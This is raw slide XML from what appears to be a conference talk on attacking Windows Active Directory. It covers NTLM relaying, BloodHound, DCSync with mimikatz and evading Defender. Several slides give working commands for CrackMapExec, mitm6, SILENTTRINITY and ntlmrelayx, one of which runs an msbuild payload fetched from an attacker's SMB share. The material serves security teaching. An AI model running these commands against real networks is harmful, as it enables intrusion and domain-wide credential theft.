              <a:t>Invoke-thehash</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68">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6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6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68">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68">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268">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68" grpId="1"/>
    </p:bldLst>
  </p:timing>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3" name="Steps…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Steps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Identify targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Set up man in the middle infrastructure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Set up relaying infrastructure </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Go to lunch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>profit </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="Invoke-thehash"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:defRPr sz="4800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Invoke-thehash</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73">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7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7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7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7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27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273">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73" grpId="1"/>
    </p:bldLst>
  </p:timing>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8" name="Tools…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="306704" indent="-306704" defTabSz="403097">
              <a:spcBef>
                <a:spcPts val="1900"/>
              </a:spcBef>
              <a:defRPr sz="2346"/>
            </a:pPr>
            <a:r>
              <a:t>Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="613409" indent="-306704" defTabSz="403097">
              <a:spcBef>
                <a:spcPts val="1900"/>
              </a:spcBef>
              <a:defRPr sz="2346"/>
            </a:pPr>
            <a:r>
              <a:t>CrackMapExec - identify vulnerable targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="0" indent="0" algn="ctr" defTabSz="315468">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1669">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>cme smb &lt;CIDR&gt; --gen-relay-list targets.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="1039188" indent="-119073" defTabSz="315468">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="910">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="613409" indent="-306704" defTabSz="403097">
              <a:spcBef>
                <a:spcPts val="1900"/>
              </a:spcBef>
              <a:defRPr sz="2346"/>
            </a:pPr>
            <a:r>
              <a:t>MITM6 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="0" indent="0" algn="ctr" defTabSz="315468">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1669">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>mitm6 -d domain.local</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="525006" indent="-218301" algn="ctr" defTabSz="315468">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="1669">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="613409" indent="-306704" defTabSz="403097">
              <a:spcBef>
                <a:spcPts val="1900"/>
              </a:spcBef>
              <a:defRPr sz="2346"/>
            </a:pPr>
            <a:r>
              <a:t>SILENTTRINITY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="0" indent="0" algn="ctr" defTabSz="315468">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1669">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>python3 ./teamserver.py &lt;ip&gt; &lt;password&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="0" indent="0" algn="ctr" defTabSz="315468">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1669">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>python3 ./st.py wss://user:password@10.1.10.136:5000 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="0" indent="0" algn="ctr" defTabSz="315468">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1669">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Follow steps to generate msbuild payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="0" indent="0" algn="ctr" defTabSz="315468">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1669">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Move to an smb share (impacket smbserver is good)  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="613409" indent="-306704" defTabSz="403097">
              <a:spcBef>
                <a:spcPts val="1900"/>
              </a:spcBef>
              <a:buChar char="‣"/>
              <a:defRPr sz="2346"/>
            </a:pPr>
            <a:r>
              <a:t>ntlmrelayx.py </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="0" indent="0" algn="ctr" defTabSz="315468">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1669">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>ntlmrelayx.py -6 -wh attacker.local -tf ./targets.txt -l /tmp/ -c ‘C:\Windows\Microsoft.NET\Framework64\v3.5\msbuild.exe \\attackerip\SMB\msbuild.xml</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="279" name="Invoke-thehash"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:defRPr sz="4800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Invoke-thehash</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78">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7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7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78">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78">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278">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278">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278">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278">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0" presetID="1" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="40" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="278">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Class="entr" nodeType="clickEffect" presetSubtype="0" presetID="1" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="44" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="278">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>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Class="entr" nodeType="clickEffect" presetSubtype="0" presetID="1" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="48" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="278">
                                            <p:txEl>
                                              <p:pRg st="10" end="1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Class="entr" nodeType="clickEffect" presetSubtype="0" presetID="1" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="52" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="278">
                                            <p:txEl>
                                              <p:pRg st="11" end="1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Class="entr" nodeType="clickEffect" presetSubtype="0" presetID="1" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="56" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="278">
                                            <p:txEl>
                                              <p:pRg st="12" end="1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Class="entr" nodeType="clickEffect" presetSubtype="0" presetID="1" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="60" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="278">
                                            <p:txEl>
                                              <p:pRg st="13" end="13"/>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Class="entr" nodeType="clickEffect" presetSubtype="0" presetID="1" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="64" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="278">
                                            <p:txEl>
                                              <p:pRg st="14" end="1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78" grpId="1"/>
    </p:bldLst>
  </p:timing>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3" name="“Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win” - John Lambert…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>“Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win” - John Lambert</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Uses graph databases and the neo4j language to visualize AD environments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Shows exploitation path to high value targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Data can be gathered by low priv user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284" name="Invoke-Bloodhound"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>Invoke-Bloodhound</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83">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8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8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8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83">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83" grpId="1"/>
    </p:bldLst>
  </p:timing>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88" name="dora_map.jpeg" descr="dora_map.jpeg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="13"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1515762" y="0"/>
            <a:ext cx="9923404" cy="9704827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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90" name="bh_sotb1.png" descr="bh_sotb1.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="987" t="987" r="987" b="987"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-119945" y="728275"/>
            <a:ext cx="13788542" cy="7756054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>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94" name="becameaDC.jpg" descr="becameaDC.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3327400" y="520700"/>
            <a:ext cx="6350000" cy="8712200"/>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9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94" grpId="1"/>
    </p:bldLst>
  </p:timing>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6" name="Feature in mimikatz…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" marL="844550" indent="-422275" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:defRPr sz="3230"/>
            </a:pPr>
            <a:r>
              <a:t>Feature in mimikatz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="844550" indent="-422275" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:defRPr sz="3230"/>
            </a:pPr>
            <a:r>
              <a:t>Allows us to extract Domain Credentials w/o logging on to the DC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="844550" indent="-422275" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:defRPr sz="3230"/>
            </a:pPr>
            <a:r>
              <a:t>Requires Domain Admin Privileges or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1266825" indent="-422275" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:defRPr sz="3230"/>
            </a:pPr>
            <a:r>
              <a:t>Replicating Directory Changes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1266825" indent="-422275" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:defRPr sz="3230"/>
            </a:pPr>
            <a:r>
              <a:t>Replicating Directory Changes All</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1266825" indent="-422275" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:defRPr sz="3230"/>
            </a:pPr>
            <a:r>
              <a:t>Replicating Directory Changes In Filtered Set (not always)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="Invoke-dcsync"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>Invoke-dcsync</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96">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9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9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9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96">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296">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296">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96" grpId="1"/>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Get-Childprocess"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:defRPr sz="4800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Get-Childprocess</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="Active Directory refresher…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="422275" indent="-422275" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:defRPr sz="3230"/>
            </a:pPr>
            <a:r>
              <a:t>Active Directory refresher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="422275" indent="-422275" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:defRPr sz="3230"/>
            </a:pPr>
            <a:r>
              <a:t>Tools of the Trade </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="422275" indent="-422275" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:defRPr sz="3230"/>
            </a:pPr>
            <a:r>
              <a:t>Active Directory Enumeration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="422275" indent="-422275" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:defRPr sz="3230"/>
            </a:pPr>
            <a:r>
              <a:t>Attacking Active Directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="844550" indent="-422275" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:defRPr sz="3230"/>
            </a:pPr>
            <a:r>
              <a:t>Relay the Hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="844550" indent="-422275" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:defRPr sz="3230"/>
            </a:pPr>
            <a:r>
              <a:t>Abusing Privlages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="844550" indent="-422275" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:defRPr sz="3230"/>
            </a:pPr>
            <a:r>
              <a:t>DCSync</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73">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7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7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7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7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17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17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173">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73" grpId="1"/>
    </p:bldLst>
  </p:timing>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1" name="Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302" name="Invoke-obfuscation"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="406400" y="1530350"/>
            <a:ext cx="12192000" cy="723900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>Invoke-obfuscation </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="303" name="Getting past Endpoint Security is hard…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Getting past Endpoint Security is hard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So hard in fact that the method I was going to demo preflood is getting flagged!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So lets check out how we can get past defender and execute mimikatz on a fully patched Win10 Enterprise system </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05" name="demo-god-meme.jpg" descr="demo-god-meme.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="13"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1625600" y="0"/>
            <a:ext cx="9753601" cy="9753600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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7" name="Get-help *"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Get-help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Invoke-tokenmanipulation -Impersonateuser ‘people smarter than me’"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="373887">
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
              <a:defRPr sz="3839"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Invoke-tokenmanipulation -Impersonateuser ‘people smarter than me’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="https://github.com/byt3bl33d3r…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:rPr u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://github.com/byt3bl33d3r</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:rPr u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://hausec.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:rPr u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://blog.cptjesus.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:rPr u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
